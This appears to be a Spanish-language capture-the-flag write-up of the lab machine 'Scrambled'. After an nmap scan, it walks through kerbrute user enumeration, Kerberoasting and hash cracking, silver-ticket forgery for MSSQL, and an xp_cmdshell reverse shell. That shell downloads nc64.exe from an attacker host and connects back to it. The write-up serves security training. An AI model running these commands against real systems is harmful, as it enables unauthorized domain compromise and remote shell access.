Scrambled

Escaneo:

       │ File: targeted
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ # Nmap 7.95 scan initiated Tue Jul 15 00:24:03 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p135,139,1433,3268,3269,389,4411,445,464,49666,49673,49674,
       │ 49716,49720,593,5985,636,80,88,9389,53 -oN targeted 10.10.11.168
   2   │ Nmap scan report for 10.10.11.168
   3   │ Host is up (0.38s latency).
   4   │ 
   5   │ Bug in ms-sql-ntlm-info: no string output.
   6   │ PORT      STATE SERVICE       VERSION
   7   │ 53/tcp    open  domain        Simple DNS Plus
   8   │ 80/tcp    open  http          Microsoft IIS httpd 10.0
   9   │ |_http-server-header: Microsoft-IIS/10.0
  10   │ |_http-title: Scramble Corp Intranet
  11   │ 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-14 22:24:12Z)
  12   │ 135/tcp   open  msrpc         Microsoft Windows RPC
  13   │ 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
  14   │ 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
  15   │ |_ssl-date: 2025-07-14T22:27:30+00:00; 0s from scanner time.
  16   │ | ssl-cert: Subject: 
  17   │ | Subject Alternative Name: DNS:DC1.scrm.local
  18   │ | Not valid before: 2024-09-04T11:14:45
  19   │ |_Not valid after:  2121-06-08T22:39:53
  20   │ 445/tcp   open  microsoft-ds?
  21   │ 464/tcp   open  kpasswd5?
  22   │ 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  23   │ 636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
  24   │ |_ssl-date: 2025-07-14T22:27:29+00:00; 0s from scanner time.
  25   │ | ssl-cert: Subject: 
  26   │ | Subject Alternative Name: DNS:DC1.scrm.local
  27   │ | Not valid before: 2024-09-04T11:14:45
  28   │ |_Not valid after:  2121-06-08T22:39:53
  29   │ 1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
  30   │ | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
  31   │ | Not valid before: 2025-07-14T22:21:42
  32   │ |_Not valid after:  2055-07-14T22:21:42
  33   │ |_ssl-date: 2025-07-14T22:27:30+00:00; 0s from scanner time.
  34   │ | ms-sql-info: 
  35   │ |   10.10.11.168:1433: 
  36   │ |     Version: 
  37   │ |       name: Microsoft SQL Server 2019 RTM
  38   │ |       number: 15.00.2000.00
  39   │ |       Product: Microsoft SQL Server 2019
  40   │ |       Service pack level: RTM
  41   │ |       Post-SP patches applied: false
  42   │ |_    TCP port: 1433
  43   │ 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
  44   │ |_ssl-date: 2025-07-14T22:27:30+00:00; 0s from scanner time.
  45   │ | ssl-cert: Subject: 
  46   │ | Subject Alternative Name: DNS:DC1.scrm.local
  47   │ | Not valid before: 2024-09-04T11:14:45
  48   │ |_Not valid after:  2121-06-08T22:39:53
  49   │ 3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
  50   │ |_ssl-date: 2025-07-14T22:27:29+00:00; 0s from scanner time.
  51   │ | ssl-cert: Subject: 
  52   │ | Subject Alternative Name: DNS:DC1.scrm.local
  53   │ | Not valid before: 2024-09-04T11:14:45
  54   │ |_Not valid after:  2121-06-08T22:39:53
  55   │ 4411/tcp  open  found?
  56   │ | fingerprint-strings: 
  57   │ |   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SM
       │ BProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns: 
  58   │ |     SCRAMBLECORP_ORDERS_V1.0.3;
  59   │ |   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
  60   │ |     SCRAMBLECORP_ORDERS_V1.0.3;
  61   │ |_    ERROR_UNKNOWN_COMMAND;
  62   │ 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  63   │ |_http-title: Not Found
  64   │ |_http-server-header: Microsoft-HTTPAPI/2.0
  65   │ 9389/tcp  open  mc-nmf        .NET Message Framing
  66   │ 49666/tcp open  msrpc         Microsoft Windows RPC
  67   │ 49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  68   │ 49674/tcp open  msrpc         Microsoft Windows RPC
  69   │ 49716/tcp open  msrpc         Microsoft Windows RPC
  70   │ 49720/tcp open  msrpc         Microsoft Windows RPC
  71   │ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submi
       │ t.cgi?new-service :
  72   │ SF-Port4411-TCP:V=7.95%I=7%D=7/15%Time=6875838B%P=x86_64-pc-linux-gnu%r(NU
  73   │ SF:LL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBLEC
  74   │ SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.
  75   │ SF:3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORDER
  76   │ SF:S_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBLEC
  77   │ SF:ORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"SCR
  78   │ SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLECOR
  79   │ SF:P_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDERS_
  80   │ SF:V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNO
  81   │ SF:WN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
  82   │ SF:")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TLS
  83   │ SF:SessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCRAM
  84   │ SF:BLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V1\
  85   │ SF:.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(FourO
  86   │ SF:hFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND
  87   │ SF:;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_
  88   │ SF:COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%
  89   │ SF:r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35,"
  90   │ SF:SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDesk
  91   │ SF:-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRAMB
  92   │ SF:LECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r
  93   │ SF:\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,"S
  94   │ SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDERS
  95   │ SF:_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r
  96   │ SF:(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLECOR
  97   │ SF:P_ORDERS_V1\.0\.3;\r\n");
  98   │ Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
  99   │ 
 100   │ Host script results:
 101   │ | smb2-time: 
 102   │ |   date: 2025-07-14T22:26:54
 103   │ |_  start_date: N/A
 104   │ | smb2-security-mode: 
 105   │ |   3:1:1: 
 106   │ |_    Message signing enabled and required
 107   │

Miramos el puerto 80 open:

No encontramos nada a simple vista por ello enumeramos usuarios con kerbrute:

kerbrute userenum -d scrm.local --dc 10.10.11.168 /opt/SecLists/Usernames/xato-net-10-million-usernames.txt

Tenemos 5 usuarios validos:

Realizaremos un Ataque Kerberoasting:

GetUserSPNs.py -dc-ip 10.10.11.168 -dc-host dc1.scrm.local scrm.local/ksimpson:ksimpson -request -k

Tenemos que crakear el hash:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash

Proceso para Obtener un TGT Silver en Kerberos con un Servicio MSSQL

GT Silver Ticket - MSSQLSvc

Requisitos previos

Cuenta de servicio SQL (MSSQLSvc/dc1.scrm.local)
Hash NTLM de la cuenta de servicio
SID del dominio
SPN del servicio objetivo

Pasos para generar el TGT Silver

Obtener Hash NTLM del usuario objetivo:

# Usando herramienta online:
https://www.browserling.com/tools/ntlm-hash


- Contraseña: `TGTsilver`
 
- Hash NTLM: `970ED87FF348A5F61441104E436A80E1`

getPac.py scrm.local/ksimpson:ksimpson -targetUser Administrator

SID obtenido: S-1-5-21-2743207045-1827831105-2542523200 (User ID 500 = Administrator)

Identificar SPN del servicio:

GetUserSPNs.py -dc-ip 10.10.11.168 -dc-host dc1.scrm.local scrm.local/ksimpson:ksimpson -request -k

SPN encontrado: MSSQLSvc/dc1.scrm.local

Generamos el ticket:

ticketer.py -nthash 970ED87FF348A5F61441104E436A80E1 \
            -domain-sid S-1-5-21-2743207045-1827831105-2542523200 \
            -domain scrm.local \
            -spn MSSQLSvc/dc1.scrm.local \
            Administrator
            ```

Usar el ticket generado**:


export KRB5CCNAME=Administrator.ccache
mssqlclient.py -k dc1.scrm.local -no-pass

# Explotación:
> Pasamos el netcat al servidor de sql server:

xp_cmdshell "curl 10.10.16.10/nc64.exe -o  C:\Temp\nc64.exe"
python3 -m http.server 80

xp_cmdshell "C:\Temp\nc64.exe -e cmd 10.10.16.10 443"
nc -nlvp 443

SQL (SCRM\administrator  dbo@master)> SELECT name FROM master.sys.databases;
name         
----------   
master       

tempdb       

model        

msdb         

ScrambleHR

PreviousEscape NextDarkZero

Last updated 6 months ago

hashtagRealizaremos un Ataque Kerberoasting:

hashtagProceso para Obtener un TGT Silver en Kerberos con un Servicio MSSQL

hashtagRequisitos previos

hashtagPasos para generar el TGT Silver

hashtagGeneramos el ticket:

Realizaremos un Ataque Kerberoasting:

Proceso para Obtener un TGT Silver en Kerberos con un Servicio MSSQL

Requisitos previos

Pasos para generar el TGT Silver

Generamos el ticket: